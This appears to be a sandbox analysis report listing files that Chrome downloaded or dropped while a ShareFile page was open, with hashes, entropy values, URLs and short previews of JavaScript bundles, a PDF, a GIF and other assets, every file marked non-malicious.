                                                                                                                                                                                                                                                                                SHA-512:961A123E53AFFD196AF2F61AFF83A72DCC7EE36B98680ABB1EEE796FBE1409EC767B5E49652D9663EA10BF6C59EDB7A1B16E79CDB2D4D6A3F0E0337FE40D8666
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevbillingpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.AccountFeatures=e.AccountFeatures,n.Api=e.Api,n.BillingEntity=e.BillingEntity,n.CountriesEntity=e.CountriesEntity,n.CurrencyCode=e.CurrencyCode,n.PaymentAuthorizationEntity=e.PaymentAuthorizationEntity,n.UserRole=e.UserRole},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Card=e.Card,i.Col=e.Col,i.Divider=e.Divider,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.InputNumber=e.InputNumber,i.Layout=e.Layout,i.Modal=e.Modal,i.Radio=e.Radio,i.Row=e.Row,i.Segmented=e.Segmented,i.Select=e.Select,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Table=e.Table,i.Tag=e.T
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):39129
                                                                                                                                                                                                                                                                                Entropy (8bit):5.542441470826308
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:LlnhwRci5kfoUOeQTxzx2iZpqTbLGKfTb/wbL3lob2DgTb/CPu49dPTbczQDsEDA:VuRci52oUg9uTvfTj4lgTjsNpTGM1Bvi
                                                                                                                                                                                                                                                                                MD5:ED0E69AAD717E49A0A8BD146E80C6B0D
                                                                                                                                                                                                                                                                                SHA1:7C066B28FB0B9B299E2F70A886B6095664CB4E7A
                                                                                                                                                                                                                                                                                SHA-256:7AEA044DD5B51F285EAF6A98A29CCB8AC6C6D417790DCDDAA1E2CA19FBC49647
                                                                                                                                                                                                                                                                                SHA-512:96AD345AF4D0CD49C5F8FB1FA6F337DF158CE0E4B77125A0AC0A0E37F2DB083250E0509DD7EA0B9CB56573A6954A8604B4657C2AC2F9CC689E03BD401138ECB3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://citrix-sharefile-data.customer.pendo.io/data/guide.json/74b07336-7560-45fc-7cd1-95032a784d52?id=12&jzb=eJyNj01r4zAQhv-LzrFlObZj-VZIWnLpBvoBy1LM2JokYmVJyHLCUvLfM84hSy-lN3v0fjzvJzvpUUcXtoo1rN1tnte_2tf26e_v7ePuXJ5hwxYM-t5NNt4kUGdlVkuRiG4lkroWVSIl1Ila7ctSFX0ny5wsUzAkPsbox4ZzH3DQGLouHY8QcK8Npr0b-O2PnzSeuajlshK5XImqKCrRU4Yz6v0_nJ2MWbABIyiIwJo7-fypv6E3YA8THJAUaNu3F3a5L5qt4P3aDaAtvX-hI-st9oeL9whxCjiy5g9zy6qkE9o-_PMRFVK-YR9U7KnAxod7PZ1ozsyWSS4ynmd5Qc4ThlG7GSlP80KmovXBKXa5XAHfzYXn&v=2.249.1_prod&ct=1728497131244
                                                                                                                                                                                                                                                                                Preview:{"guides":[{"createdByUser":{"id":"","username":"","first":"","last":"","role":0,"userType":"","hasLoggedIn":false},"createdAt":1694012335560,"lastUpdatedByUser":{"id":"","username":"","first":"","last":"","role":0,"userType":"","hasLoggedIn":false},"lastUpdatedAt":1697135142143,"appId":-323232,"id":"DGXiXepNeRvpgcvqVVwgerMyl9c","name":"Video - How to add an upload link to your email signature","state":"public","emailState":"","launchMethod":"launcher","isMultiStep":false,"isTraining":false,"attributes":{"dates":{"de":"Sep. 6, 2023","en-US":"Sep 6, 2023","es-ES":"sep. 6, 2023","fr":"sept. 6, 2023","ja":"9. 6, 2023","ko":"9. 6, 2023","nl":"sep. 6, 2023","pt-BR":"Set 6, 2023","ru":"..... 6, 2023","zh-CN":"9. 6, 2023"},"device":{"type":"all"},"isAnnouncement":true,"priority":689,"sharedServiceVersion":"4.8.18","type":"building-block"},"audienceUiHint":{"filters":[]},"authoredLanguage":"en-US","recurrence":0,"recurrenceEligibilityWindow":0,"resetAt":0,"publishedAt":1694021649968,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65474)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):650980
                                                                                                                                                                                                                                                                                Entropy (8bit):5.518287641652362
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:xOq/TqppnEuBOn0ffoPNOAihD3YV3IV3lV3q0D4wVqGV3DV3kVqzVqd7lS048yF1:zyO0ffoPNqhD34m4H53cWfxcT
                                                                                                                                                                                                                                                                                MD5:D46761310B3C627CC468F3B845E55ECA
                                                                                                                                                                                                                                                                                SHA1:41E1ED698BAF4A8B5228B551175ABA04B1F3D573
                                                                                                                                                                                                                                                                                SHA-256:ADE7ADA624732E91D0A25FBE9715B4628827176AD5ED40EDA779916A9C15CEC8
                                                                                                                                                                                                                                                                                SHA-512:0EECBC74A272D297DEC3BCC12E3F52D2741B6DA0C97478438B640BA9A9BABF6DD47ADEA182D8F2C8561C6DD61FC7C00CB9DF2B583093EF30C761F8D65BA59E59
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevintegrationspilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.AutoComplete=e.AutoComplete,r.Avatar=e.Avatar,r.Badge=e.Badge,r.Button=e.Button,r.Col=e.Col,r.Collapse=e.Collapse,r.ConfigProvider=e.ConfigProvider,r.Divider=e.Divider,r.Drawer=e.Drawer,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.Layout=e.Layout,r.Menu=e.Menu,r.Modal=e.Modal,r.Row=e.Row,r.Select=e.Select,r.Space=e.Space,r.Spin=e.Spin,r.Table=e.Table,r.Tabs=e.Tabs,r.Tag=e.Tag,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i["default"]=e["default"],i.findDOMNode=e.findDOMNode,i.flushSync=e.flushSync}],execute:function(){e((()=>{var e,a,s={9178:(e,t,n)=>{"use strict";function r(e){var t,n,r=argu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 44662
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):15838
                                                                                                                                                                                                                                                                                Entropy (8bit):7.9857449109303
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:uAkOpH6Xz726BDb7DxpT4W/6EQFqiDaiy7fZzU4IqKCzLApTPi:NkOpH6f2eDbxpMqQFjWhZgCgPi
                                                                                                                                                                                                                                                                                MD5:1FFE574A5BF39AD4F79875BE0929559A
                                                                                                                                                                                                                                                                                SHA1:485A4F0A3FFD6E16CB6B55ECDF8AB43F8BD416B2
                                                                                                                                                                                                                                                                                SHA-256:17CCC23F84FB9728FD31183C13F7327443B5928A5BDAD486807611A5BCDA68C5
                                                                                                                                                                                                                                                                                SHA-512:F0E7F983C1B2C28BB28BB88139AC724052BB71C980B26780C6F91A84C41C57D47F977273587C2754754A36DE124B208E877C61DC6DCC4D8A15C26EBD35B54C35
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:http://unbouncepages.com/_ub/static/ts/e6c35f50fd3355ae56cc4292c3ae66e2e57ced28.js
                                                                                                                                                                                                                                                                                Preview:...........}k{.8.........D0-.8.a..I:.Ibw.t.Q{(...S.B......}..IP....9..\b..@..o....[.....>..k.|..KO..o.B.%..0...._....8oNO^..x.;.z........../n1.....L%s.......8......`I-[.D...w&.wj.P.Y.{+....)....$Z.".@.c.....d..j.l...S5X.@U..I....Y.#5......C...b :..U.,P.o.f....h.......~..?X.*...hy..Al$.F+..(..p....U.......l~,"..Z..O^.|...._....._._\~......&......u....K.......k.......z.m.A..H.F..._..........xN.H.f.,2/......N.3..?.S_D1.....X......=.....A...l............xP.zw.....f#>..Q=@.b.....h..e2`G....*..[O,.Y.E1...?.?U=.7...Q<.."$..B!q..`>.........qx......7....p.....M@.j@l$d+GGG..-.......k..kv..,v.....v.#.......{{.\....;.,.._.._.d...;.:.$.$.1...I..r.....6.#...hq.N.;...Q6........No|xx ..c... 8.....>x.w.......4C...%.9.(:::...v..l..`......^.c.&..M..(sb..=.....[.t..u..=....}T..D.1F......m.....N....L.h..x...-..*.E}....u..V.....DYS..a....W..........(.....$"...1..`w.........8.HP.... ....r...&.N..".2...z..V.l.p6..T.X4k=Og3..U.i..+'H.<k...!..q..;.8...s.8
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.875
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:HoUinYn:IUyY
                                                                                                                                                                                                                                                                                MD5:903747EA4323C522742842A52CE710C9
                                                                                                                                                                                                                                                                                SHA1:9F806EA4288867A31A4AD53AC171AA4029DF182B
                                                                                                                                                                                                                                                                                SHA-256:4BD8B60F91849C936AE45615145A7B7BE2CF803322A30BABBAE7267A142CA5BB
                                                                                                                                                                                                                                                                                SHA-512:EEF73DC29A38ED70FFCFC321931BCB5B5A29FAAC356E8F6D84F57C532EEF44AE75021C341CF7DAE26B8211924A1C0E0EC4735F6BFC4AF3970A48EB63BFB7895F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAlWGdmQ3x6_zhIFDYOoWz0=?alt=proto
                                                                                                                                                                                                                                                                                Preview:CgkKBw2DqFs9GgA=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):262562
                                                                                                                                                                                                                                                                                Entropy (8bit):5.460736355290442
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:ixuUhOAHCPt2iJXelIisbEaAAjWrIQhyzXMV47QqV/rZs2U4fHyVIY/cm:ixBOLPt2iJXefAoV4/V/84fSVIy
                                                                                                                                                                                                                                                                                MD5:0D0A56254A42D9B0CA24878E2CE733BE
                                                                                                                                                                                                                                                                                SHA1:2310B1FA4E2BC3634D32B4EFC3703B05F13C8E8D
                                                                                                                                                                                                                                                                                SHA-256:81CD50C7970051569C9F82B909C95A90E44A93F765362ED25B28AC4D69085383
                                                                                                                                                                                                                                                                                SHA-512:4A03796D7208CD0F6A22CCAC32E9A6633055E04E6714ABF8E1E6A4E22B51D01EF2CB225C9878020B073D89B364CC7F7E495A5DC16567A699285D3276DB4F20B1
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-request-list-pilet/1.9.18/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevrequestlistpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},s={},c={},u={};return Object.defineProperty(a,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.BundleType=e.BundleType,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):424707
                                                                                                                                                                                                                                                                                Entropy (8bit):5.59026129046881
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:7+lwO9OOxqNatZ0liS120AAjWNIGhyBXah7+NDiXlgSHwIhBa8gFOrai+pL53+gR:7+t9O6qNatZzAqeoAFJi89dx46Z
                                                                                                                                                                                                                                                                                MD5:084DDCA8EB1D6BFE21F54C9820777876
                                                                                                                                                                                                                                                                                SHA1:FD5E045C591FCBAA81F17634986867EBD4D1C2F1
                                                                                                                                                                                                                                                                                SHA-256:4452E46BDBD44B1E5A22EDFF4FD143DBE233FB66A4752027301E7F8F03FF5587
                                                                                                                                                                                                                                                                                SHA-512:5A1BAD86A30DD65A0B8CAF3C5AF6337FE364F42098BE504DD34AA8D6586B4383C6F7F8D9118911B3A66A6D4AB0AA6AEEB8E83D6684305D925B57CB8A7B0BBDC8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-dashboard/0.164.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevclientdashboard,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},l={},i={},a={};return Object.defineProperty(l,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ItemsEntity=e.ItemsEntity},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Avatar=e.Avatar,o.Button=e.Button,o.Divider=e.Divider,o.Dropdown=e.Dropdown,o.Empty=e.Empty,o.Flex=e.Flex,o.Grid=e.Grid,o.Image=e.Image,o.Layout=e.Layout,o.Modal=e.Modal,o.Popover=e.Popover,o.Skeleton=e.Skeleton,o.Space=e.Space,o.Spin=e.Spin,o.Typography=e.Typography,o.theme=e.theme},function(e){Object.keys(e).forEach((function(t){l[t]=e[t]}))},function(e){i.HashRouter=e.HashRouter,i.Link=e.Link,i.NavLink=e.NavLink,i.Route=e.Route,i.useHistory=e.useHistory,i.useLocation=e.useLocation},function(e){a.__awaiter=e.__awaiter,a.__rest=e.__rest}],execute:function(){e((()=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):271384
                                                                                                                                                                                                                                                                                Entropy (8bit):7.813202875304079
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:+6fDd99r/72McIzOXshWrmlgW/kz+LZ0n8SjqmSkN+WPl86:+kDdb/D3zO+WalgW/A+LZ0nLWlkAWPlr
                                                                                                                                                                                                                                                                                MD5:BF1404EB713727C9C1B94F43CDBCF96E
                                                                                                                                                                                                                                                                                SHA1:D8E918CDA478B855D1253A87CE5D76A8E7EE2F3E
                                                                                                                                                                                                                                                                                SHA-256:466E7752332B087CB7189489A028AB1EA70B6C69A9A0A92F6F2972FF4808A45C
                                                                                                                                                                                                                                                                                SHA-512:BFC3CC923FC512D3A89D5CA5A816468E48198C3858E52AA7D731EBFD1A3CCA4F739F2AE5062021A263ED32260E5999AF1BBD334C9E01B6D7F057D6939EE321D8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://storage-cf-us.sharefile.com/Download/a8050891-1b71-8816-99a8-d7f55d4cb952/fi3d0bc8-b618-4e82-8fd1-179ebf99008c.scenc?downloadId=dtdb85cdf89336431c98e9c6f50939c4a0&accountId=a8050891-1b71-8816-99a8-d7f55d4cb952&correlationId=IzoXVYhPWxL0a77Q3chjRg&Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiaHR0cHM6Ly9zdG9yYWdlLWNmLXVzLnNoYXJlZmlsZS5jb20vRG93bmxvYWQvYTgwNTA4OTEtMWI3MS04ODE2LTk5YTgtZDdmNTVkNGNiOTUyL2ZpM2QwYmM4LWI2MTgtNGU4Mi04ZmQxLTE3OWViZjk5MDA4Yy5zY2VuYz9kb3dubG9hZElkPWR0ZGI4NWNkZjg5MzM2NDMxYzk4ZTljNmY1MDkzOWM0YTAmYWNjb3VudElkPWE4MDUwODkxLTFiNzEtODgxNi05OWE4LWQ3ZjU1ZDRjYjk1MiZjb3JyZWxhdGlvbklkPUl6b1hWWWhQV3hMMGE3N1EzY2hqUmciLCJDb25kaXRpb24iOnsiRGF0ZUxlc3NUaGFuIjp7IkFXUzpFcG9jaFRpbWUiOjE3Mjg1ODM1NTN9fX1dfQo_&Expires=1728583553&Signature=Jvm7VvZJeWduZ68V~mfwSQFkSJmooFy4qhe9l80O4nycVmQUvvNrJQwMBKxytePP70MXd4pZuWFmIebvTvsogC0~4hyD-Uoq-4FlWh0g295UbEckWsuwD103US5dmqlC-4r52XxWQfYOt5pP7AwYps2PC0LEvAkpHv5tWqQ2doAZAgB9bk3tokFXdYSS4ptFMaj4~o-yfPpRRYW2UhYlWIDiZx4H20u0DVauW6UbmkkpJQSWA8rZ7s1UOC7cYp9MWeQGsXTyeOrIUefSNze4CfGxmq8YiDgCHaHU9l5MDkeAk13VUEmIc6zfiRYeJ11jRIDu-21OcAKckimhdojHAw__&Key-Pair-Id=K3FMEQJQYC19VP
                                                                                                                                                                                                                                                                                Preview:%PDF-1.7.%......13 0 obj.<</Linearized 1/L 244616/O 15/E 240177/N 2/T 244306/H [ 488 202]>>.endobj. ..27 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<DC45ED11E248B004AD2E1EB5BAECB6CA><A4E9C85B63DBD848A4BAED7FA03B20CD>]/Index[13 28]/Info 12 0 R/Length 84/Prev 244307/Root 14 0 R/Size 41/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``Z."....(....w..(.I.......D...... ..)X<.,..H......4y.X...".?.........#..endstream.endobj.startxref..0..%%EOF.. ..40 0 obj.<</Filter/FlateDecode/I 131/Length 115/O 115/S 62>>stream..h.b```f``2c`a``|. ..B@.. ..2........hr.SEG{GG.X...@1.C.P......+......xA..k?."...M.F3.....5"@...[....yg?... ..[N.N..endstream.endobj.14 0 obj.<</Metadata 5 0 R/Outlines 10 0 R/Pages 11 0 R/Type/Catalog>>.endobj.15 0 obj.<</Annots[28 0 R]/Contents 17 0 R/CropBox[0.0 0.0 595.28 841.89]/MediaBox[0.0 0.0 595.28 841.89]/Parent 11 0 R/Resources<</ColorSpace<</CS0 29 0 R>>/Font<</C0_0 34 0 R/C2_0 38 0 R>>/ProcSet[/PDF/Text/ImageC/ImageI]/XObject<
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65402)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):221391
                                                                                                                                                                                                                                                                                Entropy (8bit):5.505848799267894
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:zKpp9PN6FBP6XHmOMDl1LXPOODKXJ0kouqtHnLM2wRz+BZKGG8cQfGIO8he+uJ8y:zKppRqBPywDlVhkouwnLllOqemP9Pmmg
                                                                                                                                                                                                                                                                                MD5:B5D95B131A56925ED34B1CF110473319
                                                                                                                                                                                                                                                                                SHA1:92E638C9042CEA3E57F02C110ABF2F76B69E7EE2
                                                                                                                                                                                                                                                                                SHA-256:D0AE89E960445A175B51BB797B1EBC7E144A775C377900CF4EAB1B239104A206
                                                                                                                                                                                                                                                                                SHA-512:9AC8D18DB3AFEBCB0E034154D91311411B0831C1BDE1E1DB8384B843E797B170E9880AB04E6E68AE9629E1159A2FE6E5C106E8AE145C9A9337C805B03CBE71B4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevuseractionspilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["@citrite/citrix-ui@25.46.0","react","react-router"],(function(e,t){var r={},n={},o={};return{setters:[function(e){r.confirmModal=e.confirmModal,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess,r.warningConfirmModal=e.warningConfirmModal},function(e){n.createElement=e.createElement,n["default"]=e["default"]},function(e){o.useHistory=e.useHistory}],execute:function(){e((()=>{var e={9669:(e,t,r)=>{e.exports=r(1609)},5448:(e,t,r)=>{"use strict";var n=r(4867),o=r(6026),i=r(4372),s=r(5327),a=r(4097),u=r(4109),c=r(7985),l=r(7874),f=r(2648),d=r(644),p=r(205);e.exports=function(e){return new Promise((function(t,r){var h,g=e.data,m=e.headers,v=e.responseType;function y(){e.cancelToken&&e.cancelToken.unsubscribe(h),e.signal&&e.signal.removeEventListener("abort",h)}n.isFormData(g)&&n.isStandardBrowserEnv()&&delete m["Content-Type"];var b=new XMLHttpRequest;if
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):98732
                                                                                                                                                                                                                                                                                Entropy (8bit):5.344399340470534
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Y6Z2P9/cG6kn0MO5lpt7ouF04pWX7HEFozgcH:gPTOXP7oum4w7RzRH
                                                                                                                                                                                                                                                                                MD5:CDCA5117242386D7CABB8C5CDEE3F9A1
                                                                                                                                                                                                                                                                                SHA1:E79CED8986A52C729CBBD2C876D0DC25C0FFD33D
                                                                                                                                                                                                                                                                                SHA-256:579901D2E27F2ED03F94DE3602CF3A15EDB7C307E6D0E325E663A8A75C81B036
                                                                                                                                                                                                                                                                                SHA-512:961A123E53AFFD196AF2F61AFF83A72DCC7EE36B98680ABB1EEE796FBE1409EC767B5E49652D9663EA10BF6C59EDB7A1B16E79CDB2D4D6A3F0E0337FE40D8666
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevbillingpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.AccountFeatures=e.AccountFeatures,n.Api=e.Api,n.BillingEntity=e.BillingEntity,n.CountriesEntity=e.CountriesEntity,n.CurrencyCode=e.CurrencyCode,n.PaymentAuthorizationEntity=e.PaymentAuthorizationEntity,n.UserRole=e.UserRole},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.App=e.App,i.Button=e.Button,i.Card=e.Card,i.Col=e.Col,i.Divider=e.Divider,i.Flex=e.Flex,i.Form=e.Form,i.Grid=e.Grid,i.Image=e.Image,i.Input=e.Input,i.InputNumber=e.InputNumber,i.Layout=e.Layout,i.Modal=e.Modal,i.Radio=e.Radio,i.Row=e.Row,i.Segmented=e.Segmented,i.Select=e.Select,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Table=e.Table,i.Tag=e.T
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (61276), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):795817
                                                                                                                                                                                                                                                                                Entropy (8bit):5.678759319464712
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:ihDAYuC5jEWpcOZ5bcU1OHP6a05t3HZo3cA3UTStt1RX0b+iVQEQK/XvFZdnGKpI:DYuC3pxz1Oia3cd+nUbfQuO
                                                                                                                                                                                                                                                                                MD5:1EF237D0B6617D5D9E82D98839B65753
                                                                                                                                                                                                                                                                                SHA1:02560680FCAF4E0465D229D2E2A46F3D81C834BD
                                                                                                                                                                                                                                                                                SHA-256:5EB2E4375E3E1625F20F5E12F9CF0DDCC854166BB54F942D2F47003D86747AFC
                                                                                                                                                                                                                                                                                SHA-512:B6D2EEE2E64F4F7752E91EB0BDA3A81550D685EDA4565F36580FF47D08450583A043BA1E7E015629D4ADF77BCB2DE8A695695025716FC0E51BEE76C33A6D8835
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:System.register(["react","react-dom","tslib"],(function(e,t){var n={},r={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){o.__assign=e.__assign}],execute:function(){e((()=>{var e,a,i={1757:(e,t,n)=>{"use strict";n.d(t,{F2:()=>u,ST:()=>s,UB:()=>c,lU:()=>l,pq:()=>a});var r=n(1413),o=n(8211);function a(e,t){if(f()&&d(e)){var n=i();window.__citrixui_internal__=(0,r.Z)((0,r.Z)((0,r.Z)({},n),t),{},{instanceSymbol:e})}}function i(){if(f())return window.__citrixui_internal__}function l(){var e,t=i();return null!==(e=null==t?void 0:t.configuration)&&void 0!==e?e:o.O}function c(){var e,t=i();return null!==(e=null==t?void 0:t.onNotification)&&void 0!==e?e:h}function s(){var e,t=i();return null!==(e=null==t?void 0:t.showModal)&&void 0!==e?e:p}function u(e){f()&&d(e)&&delete window.__citrixui_
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                                                                                MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                                                                                SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                                                                                SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                                                                                SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:GIF89a.......,..........
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                                Category:downloaded
